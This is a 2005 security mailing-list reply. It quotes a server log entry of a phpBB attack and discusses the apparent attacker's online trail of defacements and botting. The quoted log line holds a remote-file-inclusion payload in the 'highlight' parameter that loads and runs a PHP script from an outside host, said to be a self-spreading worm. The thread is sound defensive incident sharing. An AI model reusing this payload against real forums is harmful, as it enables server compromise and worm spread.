Interestingly enough if you google for a combinations of that log entry you dont get much until you hit "sirh0t". Google turns up quite a bit on this busy fellow as evidenced here: http://www.google.com/search?hl=en&lr=&c2coff=1&q=sirh0t&btnG=Search
sirh0t seems to be into defacing phbb forums and a bit of botting. The real entertaining part is when you go to the w00pie.nl (sirh0ts) site, it seems to have been defaced by another group "0x1fe crew" that have a low opinion of our lad sirh0t, I'll leave the content for you to view at: http://w00pie.nl A bit more googling turns up the following: "Five computer hackers in the Netherlands have been handed sentences ranging from work orders to youth detention for disabling a number of websites operated by the Dutch government." http://lists.jammed.com/ISN/2005/03/0090.html Have a nice day. On 12/10/05, Robin <[EMAIL PROTECTED]> wrote: > I just noticed these in my logs: > 63.193.240.128 - - [11/Dec/2005:01:43:25 +1300] > "GET /pbem/viewtopic.php?t=37&highlight=%2527.$poster=include($_GET[m]). > %2527&m=http://www.yatas.com/phpbb_private.txt?&; HTTP/1.0" 403 1094 > "http://www.google.nl/"; "Mozilla/4.0 (modded by sirh0t fuck Aleks)" > > this is pointing to a phpBB install that I chmod'ed away just recently (it > was unused and attracting spam), hence the 403. A quick google for the UA > string doesn't show up anything, however the URL that it links to seems > to contain a PHP script that at a quick glance uses Google and Lycos to > find more phpBB sites and spread to them. (If the yatas.com link is gone, > and anyone wants a copy of the file, mail me offlist) > > I'm also curious to know what the versions vulnerable to this exploit are. > > -- > Robin <[EMAIL PROTECTED]> JabberID: <[EMAIL PROTECTED]> > > Hostes alienigeni me abduxerunt. Qui annus est? > > PGP Key 0xA99CEB6D = 5957 6D23 8B16 EFAB FEF8 7175 14D3 6485 A99C EB6D > > >
